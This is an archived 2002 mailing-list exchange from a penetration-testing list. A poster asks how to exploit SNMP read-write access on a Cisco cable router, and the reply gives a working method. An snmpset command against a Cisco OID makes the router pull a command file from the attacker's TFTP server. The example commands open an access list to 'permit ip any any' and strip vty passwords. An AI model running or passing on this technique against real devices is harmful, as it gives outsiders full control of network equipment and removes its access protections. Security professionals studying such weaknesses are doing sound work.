Even though this is not exactly what you are looking for, you might wanna give it a try. I used this in the past to change configs & access-lists on remote Cisco routers/switches, using only the RW community. Basically, this is the method to upload "config t" commands via TFTPBOOT. It basically gave me the access to the router's configuration mode (conf t) command line access. My box was set up as a TFTPBOOT & had the commands in a script, exactly as how I would enter them on the config t prompt. For ex. to kill & open access-list 15, I had this in my tftpboot script: no access-list 15 access-list 15 permit ip any any You could obviously add whatever you need like "line vty 0 4 no password PA$$WORD enable secret SECRETPA$$" etc... Here's how I did it. I did set up a TFTPBOOT server on my box & sent an snmpset to the remote Cisco device. I used a Solaris box to send my SNMP request, this box had a TFTBOOT set up as well. The script was located in the TFTPboot snmpset -c RWcommunity IPADDRESS_of_the_router .1.3.6.1.4.1.9.2.1.55.IP_ADDRESS_OF_YOUR_TFTPBOOT octetstring name_of_the_config_on_the_tftp Ex: node 10.10.10.198 RW private tftpboot address: 192.168.4.119 File located in TFTPBOOT directory, containing the list of configuration commands: confg_file snmpset -c private 10.10.10.198 .1.3.6.1.4.1.9.2.1.55.192.168.4.119 octetstring confg_file I used this little shortcut 'internally' & not on out on the internet. I hope this works for you out there... Cheers, Sylvain Robichaud -----Original Message----- From: Wolf, Glenn [mailto:glenn.wolf@we-inc.com] Sent: November 26, 2002 2:10 PM To: pen-testat_private Subject: Cisco UBR920 cable router - SNMP to change telnet passwords? Hi, As per the following vulnerability: http://online.securityfocus.com/bid/3758 ... does anyone know how to exploit SNMP read-write access to change or retrieve the usernames/passwords protecting the telnet access? I have SNMP read-write access on the Cisco UBR920 cable router, so I could DoS it, but I'm looking for further access. Thanks in advance, Glenn ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/ __________________________________________________ Do you Yahoo!? Yahoo! Mail Plus - Powerful. Affordable. Sign up now. http://mailplus.yahoo.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Sat Nov 30 2002 - 12:38:17 PST